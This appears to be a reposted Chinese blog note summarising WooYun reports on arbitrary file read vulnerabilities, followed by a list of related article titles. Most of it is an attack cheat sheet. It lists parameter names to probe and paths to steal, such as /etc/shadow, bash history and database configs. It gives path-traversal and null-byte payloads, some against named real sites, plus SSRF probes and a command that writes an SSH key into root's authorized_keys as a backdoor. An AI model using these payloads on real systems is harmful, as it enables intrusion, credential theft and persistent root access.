乌云漏洞笔记1-任意文件读取
来源:互联网 发布:js委托事件 编辑:程序博客网 时间:2024/04/28 20:23
阅读时间16.01.18
page1-3
敏感字段
&RealPath=&FilePath=&filepath=&Path=&path=&inputFile=&url=&urls=&Lang=&dis=&data=&readfile=&filep=&src=&menu=META-INFWEB-INF
可利用路径
/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history 找user add,cd,mysql,ssh,nohop看敏感目录和文件等
/etc/syscomfig/network-scripts/ifcfg-eth1
sed -i ‘/95_251/d’ /root/.ssh/authorized_keys
url=file:///etc/passwd
url=http://10.29.5.24(ssrf内网探测)
/opt/nginx/conf/nginx.conf
file:///,gopher://,ftp://
/configs/database.php
Payload
http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class
配合截断规则:/etc/passwd%00.jpg
../../../../../../../../../../etc/passwd%00.jpg
http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355
http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
echo ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >> /root/.ssh/authorized_keys
- 乌云漏洞笔记1-任意文件读取
- PhpMyadmin任意文件读取漏洞
- 任意文件读取下载漏洞
- PHPcmsV9任意文件读取漏洞拿Shell
- SpeedCMS任意文件下载读取漏洞
- PHPCMS V9 任意文件读取漏洞
- PHPcmsV9任意文件读取漏洞拿Shell
- git 漏洞导致任意文件读取
- FFmpeg任意文件读取漏洞分析
- FFmpeg任意文件读取漏洞分析
- FFmpeg任意文件读取漏洞分析
- FFmpeg曝任意文件读取漏洞
- 【漏洞预警】FFmpeg曝任意文件读取漏洞
- PHP远程任意文件读取及目录遍历漏洞
- WEB安全系列之如何挖掘任意文件读取漏洞
- PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
- 任意文件包含漏洞
- 乌云 漏洞 apkbus api
- 简述下一代mapreduce,yarn或者说是mrv2
- Nhibernate中enum属性映射问题
- eclipse如何将中文版转换成英文版
- Android拍照并保存(对图片进行压缩,分解)
- ASCII、Unicode、GBK和UTF-8字符编码
- 乌云漏洞笔记1-任意文件读取
- VS2012下进行QT creator登录对话框设计
- 算法与数据结构
- EXTJS改变自带样式的那种风格
- 设计模式读书笔记-----外观模式
- 基于Elasticsearch2.1.1的JavaAPI基本操作代码示例
- org.hibernate.hql.ast.QuerySyntaxException:is not mapping
- [链表]面试题9
- linux下man指令后面的数字的含义